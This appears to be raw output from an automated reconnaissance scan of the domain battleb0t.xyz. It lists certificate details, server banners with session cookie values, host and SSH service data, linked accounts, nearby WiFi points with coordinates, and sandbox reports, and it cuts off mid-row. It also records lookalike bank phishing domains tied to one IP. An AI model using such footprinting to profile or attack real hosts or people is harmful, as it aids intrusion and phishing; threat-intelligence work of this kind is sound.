0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 13 16:23:51.711 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:74:49:47:F4:26:47:0D:47:E2:9A:66:AF:
F3:3B:46:53:9D:6A:00:FC:C4:5B:6D:E9:3D:6A:E5:A3:
AC:D8:18:26:02:21:00:F0:DF:BE:68:08:A5:73:33:B8:
41:78:C8:F1:1D:97:89:D0:3C:53:99:EC:D3:37:A8:F1:
3C:4D:2D:2A:6D:AA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 13 16:23:51.724 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C5:F1:D7:EC:63:EF:D2:2B:1D:83:7B:
83:54:8D:82:F0:09:7B:86:48:A1:52:8A:D7:9F:9A:A4:
8F:C9:E6:6D:A9:02:21:00:BF:BA:DA:57:96:9F:75:77:
05:96:B4:C2:FA:F6:06:66:B5:84:A9:CC:F1:BA:83:9B:
82:75:E0:63:24:71:36:67
Signature Algorithm: sha256WithRSAEncryption
85:63:54:da:d2:e7:1a:fb:ec:3f:3a:27:f7:a7:67:fe:c8:7b:
01:a2:64:e4:ee:ee:8e:f0:73:aa:5c:d0:77:bb:6f:be:12:26:
63:92:52:2b:90:c5:19:0c:01:d9:fb:68:bc:45:29:22:6d:35:
24:74:65:da:4b:43:d7:65:1a:2d:49:c6:90:fb:fd:df:39:3b:
cf:ed:9d:e1:a6:3d:3e:a0:05:2d:c4:03:55:00:85:97:89:e2:
1e:88:22:b2:ee:28:86:0f:c1:b8:e5:17:29:7c:e7:e3:6e:66:
99:6b:e8:89:3f:2e:a5:71:74:a0:b7:70:7a:4e:d4:b2:8a:69:
b1:f7:4b:20:bd:fb:7b:d5:07:9a:0c:c6:99:dd:4b:3f:c8:5e:
41:b1:8e:dd:2a:1a:39:aa:08:e2:1e:e6:e3:63:8f:d4:59:98:
ae:0a:7d:59:e3:fc:7d:a9:1f:51:9d:83:fc:16:e1:80:20:2f:
21:21:50:dd:de:43:12:b9:29:89:20:37:79:64:39:a0:00:fa:
b9:f2:d1:d6:97:d7:a4:ad:65:b2:7e:a9:68:2b:1e:77:25:f0:
a5:6a:9b:71:2e:77:c5:cb:51:1f:d8:52:be:f1:4f:2f:03:bf:
1b:74:58:57:b0:dc:c1:17:3e:44:8c:02:67:40:b6:b2:69:3c:
5b:81:25:af
| battleb0t.xyz |
| 2023-05-12 02:55:15 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
Date: <REDACTED>
Set-Cookie: XSRF-TOKEN=eyJpdiI6IkpHMTdmeTU3ZDYwZnVJOEZ6K1lCMmc9PSIsInZhbHVlIjoiMXA0Z1VsZWxwK2dDVkY4Sk1IWVdXKzNzaU8zM1VPcytNUE9HZEtmVkpmY0tRQ3BMczIyMjR4ZU9VWFdDRTRVNG94cU5KbXFkdnA3L3dVdEo3cy9YYTgvOWdtdHpISktCOWlOa0UrWG1LZWtPL1lVWHFsOEhhRjFaZ3dYZDZiU2siLCJtYWMiOiJiYzUwNmFjZjdkMzVlMzczZWI5YTJmMzM4NWFhOGYwYTA0Y2VkNmJlZWI5YmZhODViNDMwMjNjYTY5NjI1NWIyIiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6ImdUVzFCME5hTHdVNjIvVHBRWjNUU2c9PSIsInZhbHVlIjoiaThZSTFKV29BNjc2ekZNZVRHdkNXTXJvVlVOZCtNemFRSlo4RFlXZ0lZR1pyV1FwMmp4K2ZmLzdmUEtBM0JTTjNTQmhnNG9uVlhabFJkUklRRkhVZmkrbVlnb1BZelR2K1VLNUkxdUhQL1d6bFBpSFk0QUJ4TzNDcjA5ZktLcjYiLCJtYWMiOiIxNzk1Nzg4OTNkYWJhNjk4NzRmM2E4Njc4ZDY3ZWE2M2Y2YzQxZTIxMTZjODQ2OTZiMDdmNWE1OGJjY2YyNzc0IiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Content-Encoding: gzip
| 165.232.113.85 |
| 2023-05-12 02:54:07 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | tumblr (Category: images)
https://ayshoo.tumblr.com | ayshoo |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Coderwall (Category: coding)
https://coderwall.com/login/ | login |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.233): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \016\025\016\005\003\005\026\004\004\004\014\016\0 (Net ID: 00:0C:30:12:EC:AE) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | FRATOAP001 (Net ID: 00:02:2D:53:7B:80) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | taxoffice (Net ID: 00:06:25:4B:60:E0) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:98:DE:00) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://oathrocalc.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3124"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_IE_EarlyTabStart_0xb6c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_ConnHashTable<3124>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c34_IESQMMUTEX_0_331"\n "IsoScope_c34_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3124"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c34_IE_EarlyTabStart_0xb6c_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "CEWY99B6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CEWY99B6.txt]- [targetUID: 00000000-00002984]\n Dropped file: "J259UJ4T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J259UJ4T.txt]- [targetUID: 00000000-00003124]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF7532A7032D3E3BFF.TMP" has type "data"- Location: [%TEMP%\\~DF7532A7032D3E3BFF.TMP]- [targetUID: 00000000-00003124]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003124]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CEWY99B6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CEWY99B6.txt]- [targetUID: 00000000-00002984]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003124]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00002984]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002984]\n "_5237E03F-4890-11ED-B1DA-080027A81AD4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF13AAB00B1FE20632.TMP" has type "data"- Location: [%TEMP%\\~DF13AAB00B1FE20632.TMP]- [targetUID: 00000000-00003124]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DF6F079E67AE4A1B66.TMP" has type "data"- Location: [%TEMP%\\~DF6F079E67AE4A1B66.TMP]- [targetUID: 00000000-00003124]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00002984]\n "_7B031BD4-4891-11ED-B1DA-080027A81AD4_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "RecoveryStore._5237E03D-4890-11ED-B1DA-080027A81AD4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://oathrocalc.netlify.app/"\n Pattern match: "https://oathrocalc.netlify.app"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/89 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63442076e8d44876b51cc291', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.148.97.127'], u'sha256': u'66a2fd4e0cf4a13e9ac67d89109c21daab9efc63458ad8218e353ddf47ff88e6', u'sha512': u'1245fe07cfb396b6773cc4d866ec988850a58e676320902da6be7733b5bdd7983344c3153f93fcefa4878d97545d293c487897b2f0e3f3d2b781792f279af4eb', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://oathrocalc.netlify.app/', u'submission_id': u'63442077e8d44876b51cc292', u'created_at': u'2022-10-10T13:39:03+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-10T13:39:03+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 7, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c7ec97b5c563d59b5a6c9f7c76210246', u'network_mode': u'default', u'processes': [], u'sha1': u'dc379d517f72ad15cd77a2b37571b936c8acb2c3', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.148.97.127 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/battleb0t | battleb0t |
| 2023-05-12 02:56:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 11, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://minehut.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.176.41.87:49733"\n "142.251.211.227:49737"\n "104.26.9.123:49738"\n "104.16.148.64:49739"\n "185.93.1.247:49740"\n "142.250.69.202:49741"\n "142.250.217.66:49743"\n "104.18.26.85:49744"\n "104.17.24.14:49746"\n "104.22.46.142:49747"\n "13.227.44.89:49748"\n "34.69.160.147:49752"\n "34.136.45.84:49753"\n "35.222.205.150:49754"\n "34.70.254.254:49755"\n "104.26.2.70:49756"\n "34.136.205.209:49758"\n "18.213.222.111:49759"\n "54.161.234.33:49765"\n "35.229.48.116:49771"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"63868ff535048f0009a9c77b--utils-lib.netlify.app"\n "ad-delivery.net"\n "api.minehut.com"\n "cdn.cookielaw.org"\n "cdnjs.cloudflare.com"\n "connect.facebook.net"\n "content.minehut.com"\n "core-lib.minehut.com"\n "media.graphcms.com"\n "pixel.tapad.com"\n "privacyportal-cdn.onetrust.com"\n "shell.minehut.com"\n "tr.snapchat.com"\n "utils-lib.minehut.com"\n "vue-legacy-ui.minehut.com"'}, 